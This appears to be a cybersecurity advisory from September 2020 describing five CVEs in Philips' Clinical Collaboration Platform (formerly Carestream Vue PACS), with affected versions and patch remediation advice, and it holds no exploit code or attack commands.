Philips Clinical Collaboration Platform Vulnerabilities

Five vulnerabilities in Philips Healthcare's HMI clinical data platform have been discovered. These vulnerabilities could be exploited to trick legitimate users into leaking sensitive information.

Threat ID:: CC-3622
Threat Severity:: Low
Published:: 21 September 2020 12:00 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

Five vulnerabilities in Philips Healthcare's HMI clinical data platform have been discovered. These vulnerabilities could be exploited to trick legitimate users into leaking sensitive information.

Affected platforms

The following platforms are known to be affected:

Philips Clinical Collaboration Platform Versions: 12.2.1 and earlier

Threat details

Introduction

Philips Healthcare has released details of multiple vulnerabilities affecting their Clinical Collaboration Platform clinical data management system.

They claim that an unauthorised attacker on the same network as a vulnerable system could exploit some or all of these vulnerabilities to obtain sensitive information.

Product re-branding

Please note that Philips Clinical Collaboration Platform was previously branded Carestream Vue PACS, and may still be registered under that name in some organisations.

Vulnerabilities

All five vulnerabilities appear to be the result of the Clinical Collaboration Platform improperly validating, or failing to validate, user inputs.

CVE-2020-14506 - Clinical Collaboration Platform does not validate that user-provided inputs have the correct parameters.
CVE-2020-14525 - Clinical Collaboration Platform does not sanitise user-provided inputs before they are used as web-based outputs.
CVE-2020-16198 - Clinical Collaboration Platform does not sufficiently validate user identity claims.
CVE-2020-16200 - Clinical Collaboration Platform does not suitable control resource allocations, which can result in a local denial-of-service condition.
CVE-2020-16247 - Clinical Collaboration Platform exposes resources to insufficiently authorised users.

Remediation advice

Philips has confirmed that all five vulnerabilities have been addressed in the following updates:

Clinical Collaboration Platform version 12.2.1.5 - June 2020 - addresses CVE-2020-14506 and CVE-2020-14525
Clinical Collaboration Platform version 12.2.5 - May 2020 - address CVE-2020-16198, CVE-2020-16200, and CVE-2020-16247

Affected organisations encouraged to contact their relevant suppliers to obtain and apply these updates. For further information, please contact Philips Healthcare support service.

Definitive source of threat updates

https://www.philips.com/productsecurity

CVE Vulnerabilities

Status Master

CVE-2020-14506

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly.

Status Master

CVE-2020-14525

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output used as a webpage that is served to other users.

Status Master

CVE-2020-16198

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. When an attacker claims to have a given identity, the software does not prove or insufficiently proves the claim is correct.

Status Master

CVE-2020-16200

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an attacker to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.

Status Master

CVE-2020-16247

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.

Last edited: 21 September 2020 1:20 pm